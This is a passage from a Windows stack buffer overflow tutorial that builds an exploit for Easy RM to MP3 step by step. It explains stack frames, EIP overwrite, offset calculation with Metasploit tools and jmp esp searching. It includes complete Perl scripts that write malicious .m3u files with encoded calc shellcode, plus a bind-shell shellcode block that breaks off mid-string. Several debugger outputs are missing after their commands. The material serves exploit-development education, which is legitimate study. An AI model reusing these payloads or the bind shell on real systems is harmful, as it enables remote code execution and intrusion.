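print(hex(esp_after_pushes), hex(first_out), hex(second_out))
```

The model leaves out bounds checks on purpose; it only shows that ESP moves down on a push and back up on a pop.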
Every time a function is called, the function parameters are pushed onto the stack, as well as
the saved values of registers (EBP, EIP). When a function returns, the saved value of EIP is
retrieved from the stack and placed back in EIP, so the normal application flow can be
resumed.
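#include <string.h>
void do_something(char *Buffer) {
    char MyVar[128];
    strcpy(MyVar, Buffer);   /* no length check: this is the vulnerable copy */
}
int main(int argc, char **argv) {
    do_something(argv[1]);
    return 0;
}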
(You can compile this code. Get yourself a copy of Dev-C++ 4.9.9.2, create a new Win32 console
project (use C as language, not C++), paste the code and compile it). On my system, I called the
project “stacktest”.
This application takes an argument (argv[1]) and passes it to the function
do_something(). In that function, the argument is copied into a local variable that holds a
maximum of 128 bytes. So… if the argument is longer than 127 bytes (+ a null byte to
terminate the string), the buffer overflows.
When function “do_something(param1)” gets called from inside main(), the following things
happen :
A new stack frame will be created, on top of the ‘parent’ stack. The stack pointer (ESP) points
to the highest address of the newly created stack. This is the “top of the stack”.
Before do_something() is called, a pointer to the argument(s) gets pushed to the stack. In our
case, this is a pointer to argv[1].
Stack after the MOV instruction :
Next, function do_something is called. The CALL instruction will first put the current
instruction pointer onto the stack (so it knows where to return to if the function ends) and will
then jump to the function code.
As a result of the push, ESP decrements 4 bytes and now points to a lower address.
(or, as seen in a debugger) :
ESP points at 0022FF5C. At this address, we see the saved EIP (Return to…), followed by a
pointer to the parameter (AAAA in this example). This pointer was saved on the stack before
the CALL instruction was executed.
Next, the function prolog executes. This basically saves the frame pointer (EBP) onto the stack,
so it can be restored as well when the function returns. The instruction to save the frame
pointer is “push ebp”. ESP is decremented again with 4 bytes.
Following the push ebp, the current stack pointer (ESP) is put in EBP. At that point, both ESP
and EBP point at the top of the current stack. From that point on, the stack will usually be
referenced by ESP (top of the stack at any time) and EBP (the base pointer of the current
stack). This way, the application can reference variables by using an offset to EBP.
Most functions start with this sequence : PUSH EBP, followed by MOV EBP,ESP
So, if you push 4 bytes onto the stack, ESP decrements by 4 bytes and EBP stays
where it was. You can then reference these 4 bytes using EBP-0x4.
Next, we can see how stack space for the variable MyVar (128 bytes) is declared/allocated. In
order to hold the data in this variable, some space is allocated on the stack: ESP
is decremented by a number of bytes. This number will most likely be more than 128
bytes, because of an allocation routine determined by the compiler. In the case of Dev-C++,
this is 0x98 bytes, so you will see a SUB ESP,0x98 instruction. That way, there is space
available for this variable.
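The effect of CALL and the prolog on ESP and EBP can be traced with simple arithmetic. The sketch below is in Python; the function name is hypothetical, and the starting value 0x0022FF60 is derived from the debugger note above (ESP at 0022FF5C right after the CALL), so treat the absolute addresses as an example from one system only.

```python
def trace_call(esp_before_call, locals_size):
    """Return (label, esp, ebp) tuples; ebp is None while it still holds the caller's value."""
    steps = []
    esp = esp_before_call - 4             # CALL pushes the return address (saved EIP)
    steps.append(("call", esp, None))
    esp -= 4                              # PUSH EBP saves the caller's frame pointer
    steps.append(("push ebp", esp, None))
    ebp = esp                             # MOV EBP,ESP starts the new frame
    steps.append(("mov ebp,esp", esp, ebp))
    esp -= locals_size                    # SUB ESP,<size> reserves room for locals
    steps.append(("sub esp,0x%x" % locals_size, esp, ebp))
    return steps

steps = trace_call(0x0022FF60, 0x98)
for label, esp, ebp in steps:
    ebp_text = "caller's" if ebp is None else "%08X" % ebp
    print("%-14s ESP=%08X EBP=%s" % (label, esp, ebp_text))
```

With these inputs, saved EIP sits at EBP+4 and saved EBP at EBP, while the locals occupy the 0x98 bytes below EBP.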
The disassembly of the function looks like this :
004012AE |. C9 LEAVE
004012AF \. C3 RETN
(Don’t worry about the code too much. The function prolog (PUSH EBP and MOV EBP,ESP)
comes first, followed by the allocation of space for MyVar (SUB ESP,98) and some MOV and
LEA instructions, which set up the parameters for the strcpy function: they take the pointer
where argv[1] sits and use it as the source to copy data from, into MyVar.)
If there would not have been a strcpy() in this function, the function would now end and
“unwind” the stack. Basically, it would just move ESP back to the location where saved EIP was,
and then issue a RET instruction. A RET, in this case, picks up the saved EIP from the stack
and jumps to it (thus, execution goes back to the main function, right after where
do_something() was called). The epilog is carried out by the LEAVE instruction, which copies
EBP into ESP and pops the saved frame pointer back into EBP, followed by RETN, which pops
the saved EIP.
The strcpy() function reads data from the address pointed to by [Buffer] and stores it in the
space reserved for MyVar, reading all data until it sees a null byte (string terminator). While
it copies the data, ESP stays where it is. The strcpy() does not use PUSH instructions to put
data on the stack… it basically reads a byte and writes it to the stack, using an index (for
example ESP, ESP+1, ESP+2, etc). So after the copy, ESP still points at the beginning of the string.
That means… If the data in [Buffer] is somewhat longer than 0x98 bytes, the strcpy() will
overwrite saved EBP and eventually saved EIP (and so on). After all, it just continues to read &
write until it reaches a null byte in the source location (in case of a string)
ESP still points at the begin of the string. The strcpy() completes as if nothing is wrong. After
the strcpy(), the function ends. And this is where things get interesting. The function epilog
kicks in. Basically, it will move ESP back to the location where saved EIP was stored, and it will
issue a RET. It will take the pointer (AAAA or 0x41414141 in our case, since it got overwritten),
and will jump to that address.
Long story short, by controlling EIP, you basically change the return address that the function
uses in order to “resume normal flow”.
Of course, if you change this return address by triggering a buffer overflow, it’s not a “normal
flow” anymore.
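The overwrite can be illustrated with a simplified model of the frame. This Python sketch assumes a layout of exactly [MyVar 128 bytes][saved EBP][saved EIP], without the extra padding a real compiler adds (0x98 bytes in the Dev-C++ case); the helper names and the saved register values are invented for the illustration.

```python
import struct

BUF_SIZE = 128   # size of MyVar in the example; real frames usually contain padding too

def make_frame(saved_ebp, saved_eip):
    """Simplified frame: the local buffer, then saved EBP, then saved EIP."""
    return bytearray(BUF_SIZE) + struct.pack("<II", saved_ebp, saved_eip)

def unsafe_copy(frame, src):
    """Mimic strcpy: copy up to and including the first NUL, ignoring the buffer size."""
    end = src.find(b"\x00")
    data = (src if end == -1 else src[:end]) + b"\x00"
    n = min(len(data), len(frame))        # the model stops at the end of the frame
    frame[:n] = data[:n]

def saved_regs(frame):
    return struct.unpack_from("<II", frame, BUF_SIZE)

frame = make_frame(0x0022FF78, 0x00401290)        # made-up saved EBP / return address
unsafe_copy(frame, b"A" * 100 + b"\x00")
intact = saved_regs(frame)                        # short input: saved values untouched

frame2 = make_frame(0x0022FF78, 0x00401290)
unsafe_copy(frame2, b"A" * 136 + b"\x00")
smashed = saved_regs(frame2)                      # long input: both overwritten with A's
print([hex(v) for v in intact], [hex(v) for v in smashed])
```

In the second case the value that RET would pick up is 0x41414141, which matches the AAAA seen in EIP when the real application crashes.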
So… Suppose you can overwrite the buffer in MyVar, EBP, EIP and you have A’s (your own
code) in the area before and after saved EIP… think about it. After sending the buffer
([MyVar][EBP][EIP][your code]), ESP will/should point at the beginning of [your code]. So if you
can make EIP go to your code, you’re in control.
Note : when a buffer on the stack overflows, the term “stack based overflow” or “stack buffer
overflow” is used. When you are trying to write past the end of the stack frame, the term “stack
overflow” is used. Don’t mix those two up, as they are entirely different.
The debugger
In order to see the state of the stack (and value of registers such as the instruction pointer,
stack pointer etc), we need to hook up a debugger to the application, so we can see what
happens at the time the application runs (and especially when it dies).
There are many debuggers available for this purpose. The two debuggers I use most often are
Windbg, and Immunity’s Debugger
Let’s use Windbg. Install Windbg (Full install) and register it as a “post-mortem” debugger
using “windbg -I”.
You can also disable the “xxxx has encountered a problem and needs to close” popup by
setting the following registry key :
In order to avoid Windbg complaining about Symbol files not found, create a folder on your
harddrive (let’s say c:\windbgsymbols). Then, in Windbg, go to “File” – “Symbol File Path” and
enter the following string :
SRV*C:\windbgsymbols*http://msdl.microsoft.com/download/symbols
(do NOT put an empty line after this string ! make sure this string is the only string in the
symbol path field)
If you want to use Immunity Debugger instead : get a copy and install it. Open Immunity
Debugger, go to “Options” – “Just in-time debugging” and click “Make Immunity Debugger just
in-time debugger”.
Launch Easy RM to MP3, and then open the crash.m3u file again. The application will crash
again. If you have disabled the popups, windbg or Immunity debugger will kick in
automatically. If you get a popup, click the “debug” button and the debugger will be launched :
Windbg :
Immunity :
This GUI shows the same information, but in a more…errr.. graphical way. In the upper left
corner, you have the CPU view, which shows assembly instructions and their opcodes. (the
window is empty because EIP currently points at 41414141 and that’s not a valid address). In
the upper right windows, you can see the registers. In the lower left corner, you see the
memory dump of 00446000 in this case. In the lower right corner, you can see the contents of
the stack (so the contents of memory at the location where ESP points at).
Anyways, in both cases, we can see that the instruction pointer contains 41414141, which is
the hexadecimal representation of AAAA.
A quick note before proceeding : On intel x86, the addresses are stored little-endian (so
backwards). The AAAA you are seeing is in fact AAAA :-) (or, if you have sent ABCD in your
buffer, EIP would point at 44434241 (DCBA)).
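The byte order can be checked quickly. The sketch below uses Python's struct module with the "<I" format (32-bit unsigned, little-endian), which plays the same role as pack('V', ...) in the Perl scripts; the two helper names are only for illustration.

```python
import struct

def as_stored(value):
    """Bytes of a 32-bit value in the order they sit in memory on x86."""
    return struct.pack("<I", value)

def eip_from_buffer(four_bytes):
    """Value a register holds after loading four bytes from the buffer."""
    (value,) = struct.unpack("<I", four_bytes)
    return value

print(hex(eip_from_buffer(b"ABCD")))   # the bytes A B C D read back as one dword
print(as_stored(0x41414141))           # four identical bytes look the same either way
```

Sending ABCD therefore shows up in EIP as 44434241, and to place a chosen address in EIP its bytes have to be written in reverse order in the file.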
So it looks like part of our m3u file was read into the buffer and caused the buffer to
overflow. We have been able to overflow the buffer and write across the instruction
pointer. So we may be able to control the value of EIP.
Since our file contains only A’s, we don’t know exactly how big our buffer needs to be in
order to write exactly into EIP. In other words, if we want to be specific in overwriting EIP (so
we can feed it usable data and make it jump to our evil code), we need to know the exact
position in our buffer/payload where we overwrite the return address (which will become EIP
when the function returns). This position is often referred to as the “offset”.
We know that EIP is located somewhere between 20000 and 30000 bytes from the beginning
of the buffer. Now, you could potentially overwrite all memory space between 20000 and
30000 bytes with the address you want to overwrite EIP with. This may work, but it is much
nicer if you can find the exact location to perform the overwrite. In order to determine
the exact offset of EIP in our buffer, we need to do some additional work.
First, let’s try to narrow down the location by changing our perl script just a little :
Let’s cut things in half. We’ll create a file that contains 25000 A’s and another 5000 B’s. If EIP
contains an 41414141 (AAAA), EIP sits between 20000 and 25000, and if EIP contains
42424242 (BBBB), EIP sits between 25000 and 30000.
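my $file= "crash25000.m3u";
my $junk = "\x41" x 25000;    # 25000 A's
my $junk2 = "\x42" x 5000;    # 5000 B's
open($FILE,">$file");
print $FILE $junk.$junk2;
close($FILE);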
Buffer :
                       [             5000 B's             ]
[AAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBB][BBBB][BBBBBBBBB......]
      25000 A's                      EIP   ESP points here
0:000> d esp
0:000> d
0:000> d
000ff830 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
That is great news. We have overwritten EIP with BBBB and we can also see our buffer in ESP.
Before we can start tweaking the script, we need to find the exact location in our buffer that
overwrites EIP.
Metasploit has a nice tool to assist us with calculating the offset. It will generate a string that
contains unique patterns. Using this pattern (and the value of EIP after using the pattern in our
malicious .m3u file), we can see how big the buffer should be to write exactly into EIP.
Open the tools folder in the metasploit framework3 folder (I’m using a linux version of
metasploit 3). You should find a tool called pattern_create.rb. Create a pattern of 5000
characters and write it into a file
root@bt:/pentest/exploits/framework3/tools# ./pattern_create.rb 5000
Edit the perl script and replace the content of $junk2 with our 5000 characters.
my $file= "crash25000.m3u";
my $junk = "\x41" x 25000;
my $junk2 = "put the 5000 characters here";
open($FILE,">$file");
print $FILE $junk.$junk2;
close($FILE);
Create the m3u file. open this file in Easy RM to MP3, wait until the application dies again, and
take note of the contents of EIP
At this time, eip contains 0x356b4234 (note : little endian : we have overwritten EIP with 34 42
6b 35 = 4Bk5).
Let’s use a second metasploit tool now, pattern_offset.rb, to calculate the exact length of the
buffer before writing into EIP. Feed it the value of EIP (based on the pattern file) and the length
of the buffer :
root@bt:/pentest/exploits/framework3/tools# ./pattern_offset.rb 0x356b4234 5000
1094
root@bt:/pentest/exploits/framework3/tools#
1094. That’s the buffer length needed to overwrite EIP. So if you create a file with 25000+1094
A’s, and then add 4 B’s (42 42 42 42 in hex) EIP should contain 42 42 42 42. We also know that
ESP points at data from our buffer, so we’ll add some C’s after overwriting EIP.
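The idea behind the two Metasploit tools can be reproduced in a few lines. This Python sketch is not the Metasploit code; it only assumes that the pattern is built from upper-case letter, lower-case letter and digit triples (Aa0Aa1Aa2…), and the function names simply mirror the tool names.

```python
import itertools
import string
import struct

def pattern_create(length):
    """Build a non-repeating pattern Aa0Aa1Aa2... (at most 26*26*10*3 characters)."""
    triples = itertools.product(string.ascii_uppercase,
                                string.ascii_lowercase,
                                string.digits)
    text = "".join("".join(t) for t in itertools.islice(triples, length // 3 + 1))
    return text[:length]

def pattern_offset(eip_value, length):
    """Find where the four bytes seen in EIP occur in the pattern (-1 if absent)."""
    needle = struct.pack("<I", eip_value).decode("ascii")   # undo the little-endian order
    return pattern_create(length).find(needle)

offset = pattern_offset(0x356b4234, 5000)   # EIP value observed after the crash
total_junk = 25000 + offset                 # the A's in front of the pattern count as well
print(offset, total_junk)
```

Because every 4-character window of the pattern is unique, the position of the window found in EIP is the number of bytes needed before the return address.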
Let’s try. Modify the perl script to create the new m3u file.
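my $file= "eipcrash.m3u";
my $junk = "A" x 26094;       # 25000 + 1094 A's, up to the saved EIP
my $eip = "BBBB";
my $espdata = "C" x 1000;     # some C's after EIP (the count is arbitrary)
open($FILE,">$file");
print $FILE $junk.$eip.$espdata;
close($FILE);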
Create eipcrash.m3u, open it in Easy RM to MP3, observe the crash and look at eip and the
contents of the memory at ESP:
0:000> d esp
In Immunity Debugger, you can see the contents of the stack, at ESP, by looking at the lower
right hand window.
Excellent. EIP contains BBBB, which is exactly what we wanted. So now we control EIP. On top
of that, ESP points to our buffer (C’s)
Note : the offset shown here is the result of the analysis on my own system. If you are trying to
reproduce the exercises from this tutorial on your own system, odds are high that you will get a
different offset. So please don’t just take the offset value or copy the source code to
your system, as the offset is based on the file path where the m3u file is stored. The buffer that
is vulnerable to an overflow includes the full path to the m3u file. So if the path on your system
is shorter or longer than mine, then the offset will be different.
We control EIP. So we can point EIP to somewhere else, to a place that contains our own code
(shellcode). But where is this space, how can we put our shellcode in that location and how
can we make EIP jump to that location ?
In order to crash the application, we have written 26094 A’s into memory, we have written a
new value into the saved EIP field (ret), and we have written a bunch of C’s.
When the application crashes, take a look at the registers and dump all of them (d esp, d eax,
d ebx, d ebp, …). If you can see your buffer (either the A’s or the C’s) in one of the registers,
then you may be able to replace those with shellcode and jump to that location. In our
example, We can see that ESP seems to point to our C’s (remember the output of d esp
above), so ideally we would put our shellcode instead of the C’s and we tell EIP to go to the
ESP address.
Despite the fact that we can see the C’s, we don’t know for sure that the first C (at address
000ff730, where ESP points at), is in fact the first C that we have put in our buffer.
We’ll change the perl script and feed a pattern of characters (I’ve taken 144 characters, but
you could have taken more or taken less) instead of C’s :
my $file= "test1.m3u";
my $junk = "A" x 26094;
my $eip = "BBBB";
my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK" .
"3ABCDEFGHIJK4ABCDEFGHIJK" .
"5ABCDEFGHIJK6ABCDEFGHIJK" .
"7ABCDEFGHIJK8ABCDEFGHIJK" .
"9ABCDEFGHIJKAABCDEFGHIJK" .
"BABCDEFGHIJKCABCDEFGHIJK";
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
Create the file, open it, let the application die and dump memory at location ESP :
0:000> d esp
0:000> d
• ESP starts at the 5th character of our pattern, and not the first character (due to
the calling convention: on return, the 4 bytes of stack space that the parent function
used to pass the argument are cleaned up as well, so ESP ends up 4 bytes past the saved EIP).
• After the pattern string, we see “A’s”. These A’s most likely belong to the first part of
the buffer (26094 A’s), so we may also be able to put our shellcode in the first part of
the buffer (before overwriting RET)…
But let’s not go that way yet. We’ll first add 4 characters in front of the pattern and do the test
again. If all goes well, ESP should now point directly at the beginning of our pattern :
my $file= "test1.m3u";
my $junk = "A" x 26094;
my $eip = "BBBB";
my $preshellcode = "XXXX";    # 4 filler bytes so that ESP lands on the pattern
my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK" .
"3ABCDEFGHIJK4ABCDEFGHIJK" .
"5ABCDEFGHIJK6ABCDEFGHIJK" .
"7ABCDEFGHIJK8ABCDEFGHIJK" .
"9ABCDEFGHIJKAABCDEFGHIJK" .
"BABCDEFGHIJKCABCDEFGHIJK";
open($FILE,">$file");
print $FILE $junk.$eip.$preshellcode.$shellcode;
close($FILE);
0:000> d esp
0:000> d
Much better !
We now have
• an area where we can write our code (at least 144 bytes large. If you do some more
tests with longer patterns, you will see that you have even more space… plenty of
space in fact)
Now we need to
• tell EIP to jump to the address of the start of the shellcode. We can do this by
overwriting EIP with 0x000ff730.
Let’s see
We’ll build a small test case : first 26094 A’s, then overwrite EIP with 000ff730, then put 25
NOP’s, then a break, and then more NOP’s.
If all goes well, EIP should jump to 000ff730, which contains NOPs. The code should slide until
the break.
my $file= "test1.m3u";
my $junk = "A" x 26094;
my $eip = pack('V',0x000ff730);
my $shellcode = "\x90" x 25;
$shellcode = $shellcode."\xcc";
$shellcode = $shellcode."\x90" x 25;
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
+0xff71f:
0:000> d esp
So jumping directly to a memory address may not be a good solution after all. 000ff730
contains a null byte, which is a string terminator, so the A’s you are seeing come from
the first part of the buffer: we never reached the point where we started writing our data
after overwriting EIP.
Besides, using a hardcoded memory address to jump to would make the exploit very
unreliable. After all, this memory address could be different in other OS versions, languages,
etc.
Long story short : we cannot just overwrite EIP with a direct memory address such as 000ff730.
It’s not a good idea because it would not be reliable, and it’s not a good idea because it
contains a null byte. We have to use another technique to achieve the same goal : make the
application jump to our own provided code. Ideally, we should be able to reference a register
(or an offset to a register), ESP in our case, and find a function that will jump to that
register. Then we will try to overwrite EIP with the address of that function and it should be
time for pancakes and icecream.
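The null byte problem is easy to demonstrate. The Python sketch below assumes that the vulnerable copy behaves like a C string copy (it stops at the first NUL); the junk is shortened to 8 bytes to keep the example readable, and the helper name is hypothetical.

```python
import struct

def c_string_copy(data):
    """Bytes a strcpy-style copy would transfer: everything before the first NUL."""
    end = data.find(b"\x00")
    return data if end == -1 else data[:end]

junk = b"A" * 8                          # shortened stand-in for the 26094 A's
ret = struct.pack("<I", 0x000FF730)      # little-endian: the 00 byte comes last
payload = junk + ret + b"\x90" * 4       # data that should follow saved EIP

copied = c_string_copy(payload)
print(ret.hex(), len(payload), len(copied))
```

Only the three non-zero bytes of the address survive the copy, and everything placed after the address is dropped. This is consistent with the A’s seen at ESP in the test above.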
We have managed to put our shellcode exactly where ESP points at (or, if you look at it from a
different angle, ESP points directly at the beginning of our shellcode). If that would not have
been the case, we would have looked to the contents of other register addresses and hope to
find our buffer back. Anyways, in this particular example, we can use ESP.
The reasoning behind overwriting EIP with the address of ESP was that we want the
application to jump to ESP and run the shellcode.
Jumping to ESP is a very common thing in windows applications. In fact, Windows applications
use one or more dll’s, and these dll’s contain lots of code instructions. Furthermore, the
addresses used by these dll’s are pretty static. So if we could find a dll that contains the
instruction to jump to esp, and if we could overwrite EIP with the address of that instruction in
that dll, then it should work, right ?
Let’s see. First of all, we need to figure out what the opcode for “jmp esp” is.
We can do this by launching Easy RM to MP3, then opening windbg and attaching windbg to the
Easy RM to MP3 application. (Just connect it to the process, don’t do anything in Easy RM to
MP3). This gives us the advantage that windbg will see all dll’s/modules that are loaded by the
application. (It will become clear why I mentioned this)
Upon attaching the debugger to the process, the application will break.
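In the windbg command line, at the bottom of the screen, enter a (assemble) and press
return. Windbg shows the address it will assemble at; enter jmp esp, press return, and press
return once more to leave assemble mode.
Now enter u (unassemble) followed by the address that was shown before entering jmp esp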
0:014> u 7c90120e
ntdll!DbgBreakPoint:
ntdll!DbgUserBreakPoint:
7c901212 cc int 3
7c901213 c3 ret
7c90121a cc int 3
Next to 7c90120e, you can see ffe4. This is the opcode for jmp esp
Look at the top of the windbg window, and look for lines that indicate dll’s that belong to the
Easy RM to MP3 application :
****************************************************************************
****************************************************************************
If we can find the opcode in one of these dll’s, then we have a good chance of making the
exploit work reliably across windows platforms. If we need to use a dll that belongs to the OS,
then we might find that the exploit does not work for other versions of the OS. So let’s search
the area of one of the Easy RM to MP3 dll’s first.
“s 70000000 l fffffff ff e4” (which would typically give results from windows dll’s)
• findjmp (from Ryan Permeh) : compile findjmp.c and run with the following
parameters :
findjmp <DLLfile> <register>. Suppose you want to look for jumps to esp in kernel32.dll, run
“findjmp kernel32.dll esp”
Findjmp2, Hat-Squad
Finished Scanning kernel32.dll for code useable with the esp register
• pvefindaddr, a plugin for Immunity Debugger. In fact, this one is highly recommended
because it will automatically filter unreliable pointers.
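What these search tools do comes down to scanning a module's bytes for the opcode ff e4 and keeping the usable addresses. A minimal Python sketch of that idea follows; the byte string and the base address 0x01CCF000 are invented sample data, not a dump of a real dll.

```python
import struct

JMP_ESP = b"\xff\xe4"    # opcode for jmp esp, as found with windbg above

def find_bytes(image, base, needle=JMP_ESP):
    """Return the address (base + offset) of every occurrence of needle in image."""
    hits = []
    pos = image.find(needle)
    while pos != -1:
        hits.append(base + pos)
        pos = image.find(needle, pos + 1)
    return hits

def null_free(address):
    """True if none of the four address bytes is 0x00."""
    return b"\x00" not in struct.pack("<I", address)

image = b"\x90\x90\xff\xe4\xcc\xc3\x55\x8b\xec\xff\xe4"   # made-up bytes
hits = find_bytes(image, 0x01CCF000)                      # made-up load address
usable = [hex(a) for a in hits if null_free(a)]
print(usable)
```

A real search has to read the bytes from the loaded module (or from the file, taking the section layout into account) and should also check that the address lies in executable memory.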
Since we want to put our shellcode at the location ESP points to (which sits in our payload
string after the bytes that overwrite EIP), the jmp esp address from the list must not have null
bytes. If this address had null bytes, we would overwrite EIP with an address that contains null
bytes. A null byte acts as a string terminator, so everything that follows would be ignored. In
some cases, it would be ok to have an address that starts with a null byte. If the address starts
with a null byte, because of little endian, the null byte would be the last byte written into the
EIP field. And if you are not sending any payload after overwriting EIP (so if the shellcode is fed
before overwriting EIP, and it is still reachable via a register), then this will work.
Anyways, we will use the payload after overwriting EIP to host our shellcode, so the address
should not contain null bytes.
Verify that this address contains the jmp esp (so unassemble the instruction at 01ccf23a):
0:014> u 01ccf23a
MSRMCcodec02!CAudioOutWindows::WaveOutWndProc+0x8bfea:
01ccf244 ff ???
01ccf245 ff ???
01ccf246 ff ???
01ccf247 ff ???
If we now overwrite EIP with 0x01ccf23a, a jmp esp will be executed. Esp contains our
shellcode… so we should now have a working exploit. Let’s test with our “NOP & break”
shellcode.
Close windbg.
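my $file= "test1.m3u";
my $junk = "A" x 26094;
my $eip = pack('V',0x01ccf23a);
my $shellcode = "\x90" x 25;
# the break below stops the application, simulating shellcode while still allowing you to debug further
$shellcode = $shellcode."\xcc";
$shellcode = $shellcode."\x90" x 25;
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);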
(21c.e54): Break instruction exception - code 80000003 (!!! second chance !!!)
+0xff734:
000ff745 cc int 3
0:000> d esp
Run the application again, attach windbg, press “g” to continue to run, and open the new m3u
file in the application.
The application now breaks at address 000ff745, which is the location of our first break. So the
jmp esp worked fine (esp started at 000ff730, but it contains NOPs all the way up to 000ff744).
All we need to do now is put in our real shellcode and finalize the exploit.
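The break address can be verified with a bit of arithmetic. The Python sketch below assumes, based on the earlier pattern test (ESP pointed at the 5th character), that the data written after saved EIP starts 4 bytes before ESP; the function name is only for illustration.

```python
def int3_address(esp_at_crash, bytes_before_esp, nop_count):
    """Address of the 0xCC byte that follows nop_count NOPs placed right after saved EIP."""
    start = esp_at_crash - bytes_before_esp   # where the data after saved EIP begins
    return start + nop_count                  # the break sits right after the NOPs

addr = int3_address(0x000FF730, 4, 25)
last_nop = addr - 1
print(hex(addr), hex(last_nop))
```

The result agrees with the debugger output: NOPs up to 000ff744 and the break at 000ff745.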
Metasploit has a nice payload generator that will help you building shellcode. Payloads come
with various options, and (depending on what they need to do), can be small or very large. If
you have a size limitation in terms of buffer space, then you might even want to look at multi-
staged shellcode, or using specifically handcrafted shellcodes such as this one (32byte cmd.exe
shellcode for xp sp2 en). Alternatively, you can split up your shellcode in smaller ‘eggs’ and use
a technique called ‘egg-hunting’ to reassemble the shellcode before executing it. Tutorial 8 and
10 talk about egg hunting and omelet hunters.
Let’s say we want calc to be executed as our exploit payload, then the shellcode could look like
this :
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
my $shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
# http://www.corelan.be
my $file= "exploitrmtomp3.m3u";
my $junk = "A" x 26094;
my $eip = pack('V',0x01ccf23a);   # address of the jmp esp found above
my $shellcode = "\x90" x 25;
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode . "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
First, turn off the autopopup registry setting to prevent the debugger from taking over. Create
the m3u file, open it and watch the application die (and calc should be opened as well).
You could create other shellcode and replace the “launch calc” shellcode with your new
shellcode, but this code may not run well because the shellcode may be bigger, memory
locations may be different, and longer shellcode increases the risk of invalid characters in the
shellcode, which need to be filtered out.
Let’s say we want the exploit to bind to a port so that a remote user can connect and get a
command line.
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
"\x31\xc9\xbf\xd3\xc0\x5c\x46\xdb\xc0\xd9\x74\x24\xf4\x5d" .
"\xb1\x50\x83\xed\xfc\x31\x7d\x0d\x03\x7d\xde\x22\xa9\xba" .
"\x8a\x49\x1f\xab\xb3\x71\x5f\xd4\x23\x05\xcc\x0f\x87\x92" .
"\x48\x6c\x4c\xd8\x57\xf4\x53\xce\xd3\x4b\x4b\x9b\xbb\x73" .
"\x6a\x70\x0a\xff\x58\x0d\x8c\x11\x91\xd1\x16\x41\x55\x11" .
"\x5c\x9d\x94\x58\x90\xa0\xd4\xb6\x5f\x99\x8c\x6c\x88\xab" .
"\xc9\xe6\x97\x77\x10\x12\x41\xf3\x1e\xaf\x05\x5c\x02\x2e" .
"\xf1\x60\x16\xbb\x8c\x0b\x42\xa7\xef\x10\xbb\x0c\x8b\x1d" .
"\xf8\x82\xdf\x62\xf2\x69\xaf\x7e\xa7\xe5\x10\x77\xe9\x91" .
"\x1e\xc9\x1b\x8e\x4f\x29\xf5\x28\x23\xb3\x91\x87\xf1\x53" .
"\x16\x9b\xc7\xfc\x8c\xa4\xf8\x6b\xe7\xb6\x05\x50\xa7\xb7" .
"\x20\xf8\xce\xad\xab\x86\x3d\x25\x36\xdc\xd7\x34\xc9\x0e" .
"\x4f\xe0\x3c\x5a\x22\x45\xc0\x72\x6f\x39\x6d\x28\xdc\xfe" .
"\xc2\x8d\xb1\xff\x35\x77\x5d\x15\x05\x1e\xce\x9c\x88\x4a" .
"\x98\x3a\x50\x05\x9f\x14\x9a\x33\x75\x8b\x35\xe9\x76\x7b" .
"\xdd\xb5\x25\x52\xf7\xe1\xca\x7d\x54\x5b\xcb\x52\x33\x86" .
"\x7a\xd5\x8d\x1f\x83\x0f\x5d\xf4\x2f\xe5\xa1\x24\x5c\x6d" .
"\xb9\xbc\xa4\x17\x12\xc0\xfe\xbd\x63\xee\x98\x57\xf8\x69" .
"\x0c\xcb\x6d\xff\x29\x61\x3e\xa6\x98\xba\x37\xbf\xb0\x06" .
"\xc1\xa2\x75\x47\x22\x88\x8b\x05\xe8\x33\x31\xa6\x61\x46" .
"\xcf\x8e\x2e\xf2\x84\x87\x42\xfb\x69\x41\x5c\x76\xc9\x91" .
